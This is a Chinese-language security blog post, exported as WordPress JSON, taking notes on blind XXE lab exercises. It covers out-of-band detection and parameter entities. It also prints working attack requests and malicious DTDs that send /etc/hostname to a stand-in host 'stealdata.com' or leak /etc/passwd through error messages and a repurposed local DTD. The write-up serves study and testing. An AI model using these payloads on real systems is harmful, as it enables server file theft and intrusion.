{"id":1200,"date":"2023-02-05T21:50:00","date_gmt":"2023-02-05T13:50:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1200"},"modified":"2024-02-17T20:19:53","modified_gmt":"2024-02-17T12:19:53","slug":"xxe-blind","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1200","title":{"rendered":"XXE blind"},"content":{"rendered":"\n<p>XXE\u76f8\u95dc\u4ecb\u7d39\u5982\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"EFPYOYf9JV\"><a href=\"https:\/\/systw.net\/note\/archives\/1193\">XXE<\/a><\/blockquote><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"XXE &#8212; \u725b\u7684\u5927\u8166\" src=\"https:\/\/systw.net\/note\/archives\/1193\/embed#?secret=Bgp3gnVc5W#?secret=EFPYOYf9JV\" data-secret=\"EFPYOYf9JV\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>\u7576\u61c9\u7528\u7a0b\u5f0f\u53d7\u5230XXE\u6ce8\u5165\u4f46\u5728\u56de\u61c9\u4e2d\u6c92\u6709\u4efb\u4f55\u653b\u64ca\u7d50\u679c\u6642\uff0c\u5f88\u96e3\u77e5\u9053\u662f\u5426\u6709XXE\u6f0f\u6d1e\u3002\u56e0\u6b64\u9700\u8981\u900f\u904e\u4e00\u4e9b\u76f2\u6ce8\u7684\u65b9\u6cd5\u53bb\u5224\u65b7\uff0c\u5e38\u898b\u7684\u5075\u6e2c\u65b9\u6cd5\u6709\u5169\u7a2e<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4f7f\u7528OAST\u6280\u8853\u5075\u6e2c<\/li>\n\n\n\n<li>\u4f7f\u7528\u53c3\u6578\u5be6\u9ad4\u5075\u6e2c<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528OAST\u6280\u8853\u5075\u6e2c<\/h2>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u8981\u6c42XXE\u8b93\u4f3a\u670d\u5668\u5411outside 
web發出HTTP請求（outside web 代表攻擊者自己控制、且目標伺服器能對外連線的主機，例如 Burp Collaborator 之類的 OAST 服務）。攻擊者在該主機上監視 DNS 查詢與 HTTP 請求，只要收到來自目標的互動就能確認 XXE 成功。注意：即使目標的出口防火牆擋掉 HTTP，解析器通常仍會先對該主機名稱做 DNS 查詢，因此單獨看到 DNS 查詢就足以證明實體被解析了；而應用程式本身的回應（如下方的「Invalid product ID」）不會透露任何跡象。<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE stockCheck &#91; &lt;!ENTITY xxe SYSTEM \"http:\/\/outside web\"&gt; ]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;&amp;xxe;&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\nContent-Type: application\/json; charset=utf-8\nConnection: close\nContent-Length: 20\n\"Invalid product ID\"<\/code><\/pre>\n\n\n\n<p>Lab: Blind XXE with out-of-band interaction<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528\u53c3\u6578\u5be6\u9ad4\u5075\u6e2c<\/h2>\n\n\n\n<p>由於應用程式的輸入驗證（或 XML 解析器的強化設定），一般實體的 XXE 攻擊可能被阻止；在這種情況下，可以嘗試使用 <code>XML parameter entities<\/code>（參數實體）。這是一種特殊類型的 XML 實體，只能在 DTD 內部引用、不能放在文件內容中（所以上面把 <code>&amp;xxe;<\/code> 放進 productId 的做法對它無效），用法是在宣告時於實體名稱之前加入 <code>%<\/code>，並以 <code>%name;<\/code> 的形式引用，如下<\/p>\n\n\n\n<p><code>&lt;!DOCTYPE foo [ &lt;!ENTITY % xxe SYSTEM \"http:\/\/outsideweb\"&gt; %xxe; ]&gt;<\/code><\/p>\n\n\n\n<p>舉例如下，要求 XXE 讓伺服器向 outside web 發出 HTTP 請求，從而偵測 XXE 攻擊是否成功。注意下方回應雖然是 400「Parsing error」，並不代表注入失敗：<code>%xxe;<\/code> 在解析 DTD 時就已觸發對外請求，解析錯誤通常只是因為取回的內容不是合法的 DTD，判斷依據應是 OAST 端是否收到 DNS／HTTP 互動。<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE stockCheck &#91;&lt;!ENTITY % xxe SYSTEM \"http:\/\/outside web\"&gt; %xxe; ]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;9&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\nContent-Type: application\/json; charset=utf-8\nConnection: close\nContent-Length: 15\n\"Parsing error\"<\/code><\/pre>\n\n\n\n<p>Lab: Blind XXE with out-of-band interaction via XML parameter entities<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>確定有 XXE 漏洞後，可以使用以下幾種盲注技巧取得數據。前兩種都需要目標伺服器能向外取回攻擊者提供的 DTD；第三種只依賴伺服器本機已存在的 DTD 檔案，適合出口連線被封鎖的環境。<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5229\u7528\u5916\u90e8DTD\u53d6\u5f97\u6578\u64da<\/li>\n\n\n\n<li>\u900f\u904e\u932f\u8aa4\u8a0a\u606f\u6aa2\u7d22\u6578\u64da<\/li>\n\n\n\n<li>\u5229\u7528\u5167\u90e8DTD\u53d6\u5f97\u6578\u64da<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p> <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528\u5916\u90e8DTD\u53d6\u5f97\u6578\u64da<\/h2>\n\n\n\n<p>方法如下，先準備一個接收數據的網址 <code>https:\/\/stealdata.com<\/code>，再準備一個放置 DTD 的網址 <code>https:\/\/dtd.website\/malicious.dtd<\/code>，內容如下。兩個網址都必須是攻擊者自己控制、且目標伺服器能連到的主機；範例中的網域只是示意，實際操作請換成自己的主機，否則會把目標的檔案內容送給不相干的第三方。<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;!ENTITY % file SYSTEM \"file:\/\/\/etc\/hostname\"&gt;\n&lt;!ENTITY % eval \"&lt;!ENTITY &amp;#x25; exfil SYSTEM 
'https:\/\/stealdata.com\/?x=%file;'&gt;\"&gt;\n%eval;\n%exfil;<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u5167\u5bb9\u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>定義一個名為 <code>file<\/code> 的 XML 參數實體，其內容為檔案 <code>\/etc\/hostname<\/code> 的內容。<\/li>\n\n\n\n<li>定義一個參數實體 <code>eval<\/code>，其值是另一個參數實體 <code>exfil<\/code> 的動態宣告，該宣告的 URL 中引用了剛剛定義的 <code>file<\/code>（<code>%file;<\/code> 在宣告 <code>eval<\/code> 時就已被替換成檔案內容）。值裡的 <code>&amp;#x25;<\/code> 是 <code>%<\/code> 的字元參照：在實體值內直接寫 <code>%<\/code> 會被當成參數實體引用立即展開，必須用字元參照讓它等到 <code>%eval;<\/code> 被引用時才變成 <code>%<\/code>。<\/li>\n\n\n\n<li>引用 <code>%eval;<\/code> 時，解析器處理其內容並真正宣告出 <code>exfil<\/code>；接著引用 <code>%exfil;<\/code>，解析器便會去取回該 URL，檔案內容就隨查詢字串送到攻擊者的主機。<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>\u63a5\u8457\u5728\u8acb\u6c42\u4e2d\u628a\u525b\u525bDTD\u7db2\u5740\u4f4d\u7f6e\u653e\u5165XXE\u4e2d\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE foo &#91;&lt;!ENTITY % xxe SYSTEM \"https:\/\/dtd.website\/malicious.dtd\"&gt; %xxe;]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;1&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\n...omit...\n\"Parsing error\"<\/code><\/pre>\n\n\n\n<p>一旦攻擊成功，伺服器就會把 <code>\/etc\/hostname<\/code> 的內容送到 <code>https:\/\/stealdata.com<\/code>，查看該主機的日誌就會看到類似以下的請求，其中 <code>a2dd82d1b9eb<\/code> 就是 <code>\/etc\/hostname<\/code> 的內容。注意這個技巧只適用於像 <code>\/etc\/hostname<\/code> 這種單行、且不含換行或 URL 特殊字元的檔案：多行檔案（例如 <code>\/etc\/passwd<\/code>）會讓組出來的 URL 不合法而使解析失敗，這種情況要改用下一節透過錯誤訊息取得資料的做法。<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><code>GET \/?x=a2dd82d1b9eb HTTP\/1.1<\/code><\/code><\/pre>\n\n\n\n<p>Lab: Exploiting blind XXE to exfiltrate data using a malicious external 
DTD<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u900f\u904e\u932f\u8aa4\u8a0a\u606f\u6aa2\u7d22\u6578\u64da<\/h2>\n\n\n\n<p>如果應用程式會把 XML 解析錯誤訊息原樣回傳到回應中，可以用惡意外部 DTD 刻意觸發一個「錯誤訊息裡帶有檔案內容」的解析錯誤；若回應會把錯誤訊息吞掉或只回固定字串，此技巧就不適用。<\/p>\n\n\n\n<p>\u65b9\u6cd5\u5982\u4e0b\uff0c\u6e96\u5099\u4e00\u500bDTD\u7db2\u5740<code>https:\/\/dtd.website\/malicious.dtd<\/code>\uff0c\u5167\u5bb9\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;!ENTITY % file SYSTEM \"file:\/\/\/etc\/passwd\"&gt;\n&lt;!ENTITY % eval \"&lt;!ENTITY &amp;#x25; exfil SYSTEM 'file:\/\/\/invalid\/%file;'&gt;\"&gt;\n%eval;\n%exfil;<\/code><\/pre>\n\n\n\n<p>上述內容和剛剛的差不多，差別在於：第一行改讀 <code>\/etc\/passwd<\/code>，第二行把 <code>exfil<\/code> 指向一個不存在的本機路徑 <code>file:\/\/\/invalid\/<\/code> 並把檔案內容接在後面。解析器在引用 <code>%exfil;<\/code> 時會嘗試開啟這個不存在的檔案，失敗的錯誤訊息會把完整路徑、也就是檔案內容一併印出來；而且因為這是本機 <code>file:\/\/<\/code> 路徑而不是要送出的 URL，換行與特殊字元不會破壞攻擊，所以連多行的 <code>\/etc\/passwd<\/code> 也讀得到。<\/p>\n\n\n\n<p>\u63a5\u8457\u5728\u8acb\u6c42\u4e2d\u628a\u525b\u525bDTD\u7db2\u5740\u4f4d\u7f6e\u653e\u5165XXE\u4e2d\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE foo &#91;&lt;!ENTITY % xxe SYSTEM \"https:\/\/dtd.website\/malicious.dtd\"&gt; %xxe;]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;1&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\n...omit...\n\"XML parser exited with non-zero code 1: 
\/invalid\/root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n...omit...<\/code><\/pre>\n\n\n\n<p>\u547c\u53eb\u60e1\u610f\u5916\u90e8DTD\u5c07\u5c0e\u81f4\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f\uff0c\u4e26\u986f\u793a\/etc\/passwd\u5167\u5bb9<\/p>\n\n\n\n<p>Lab: Exploiting blind XXE to retrieve data via error messages<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528\u5167\u90e8DTD\u53d6\u5f97\u6578\u64da<\/h2>\n\n\n\n<p>前面的技巧都需要伺服器向外取回攻擊者的 DTD；若目標無法對外連線，可以改用伺服器本機已存在的 DTD 檔案。原理是：XML 規範不允許在內部 DTD（文件內的 DOCTYPE 區塊）裡，於一個參數實體的定義中引用另一個參數實體；但當文件同時混用內部與外部 DTD 時，內部 DTD 可以重新定義外部 DTD 中宣告的實體，此時這個限制就會放寬。這意味著攻擊者可以藉由重新定義本機 DTD 裡的某個參數實體，把基於錯誤訊息的 XXE 技巧完全放在內部 DTD 中執行，不需要任何對外連線。<\/p>\n\n\n\n<p>例如，假設伺服器檔案系統上有一個 DTD 檔案 <code>\/usr\/share\/yelp\/dtd\/docbookx.dtd<\/code>（常見於裝有 GNOME yelp 的 Linux 系統），並且該 DTD 定義了一個名為 <code>ISOamso<\/code> 的參數實體。攻擊者想看 <code>\/etc\/passwd<\/code> 時，先用 <code>local_dtd<\/code> 載入這個本機 DTD，再在內部 DTD 中重新定義 <code>ISOamso<\/code>，把讀檔與觸發錯誤的宣告塞進去，如下。注意兩點：第一，這需要猜到目標上確實存在、且內含可被覆寫之參數實體的 DTD 檔案，若 <code>local_dtd<\/code> 指向的檔案不存在，攻擊在第一步就會失敗，可藉由回應差異來枚舉常見路徑；第二，範例中的 <code>&amp;#x25;<\/code> 代表 <code>%<\/code>、<code>&amp;#x26;#x25;<\/code> 代表再多包一層編碼的 <code>%<\/code>、<code>&amp;#x27;<\/code> 代表單引號，因為實體值每往內一層就要多做一次字元參照編碼，否則會被提前展開或提早結束引號。<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE message &#91;\n&lt;!ENTITY % local_dtd SYSTEM 
\"file:\/\/\/usr\/share\/yelp\/dtd\/docbookx.dtd\"&gt;\n&lt;!ENTITY % ISOamso '\n&lt;!ENTITY &amp;#x25; file SYSTEM \"file:\/\/\/etc\/passwd\"&gt;\n&lt;!ENTITY &amp;#x25; eval \"&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:\/\/\/nonexistent\/&amp;#x25;file;&amp;#x27;&gt;\"&gt;\n&amp;#x25;eval;\n&amp;#x25;error;\n'&gt;\n%local_dtd;\n]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;1&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\n...omit...\n\"XML parser exited with non-zero code 1: \/nonexistent\/root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting XXE to retrieve data by repurposing a local DTD<\/p>\n","protected":false},"excerpt":{"rendered":"<p>XXE\u76f8\u95dc\u4ecb\u7d39\u5982\u4e0b \u7576\u61c9\u7528\u7a0b\u5f0f\u53d7\u5230XXE\u6ce8\u5165\u4f46\u5728\u56de\u61c9\u4e2d\u6c92\u6709\u4efb 
&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-1200","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1200"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1200\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}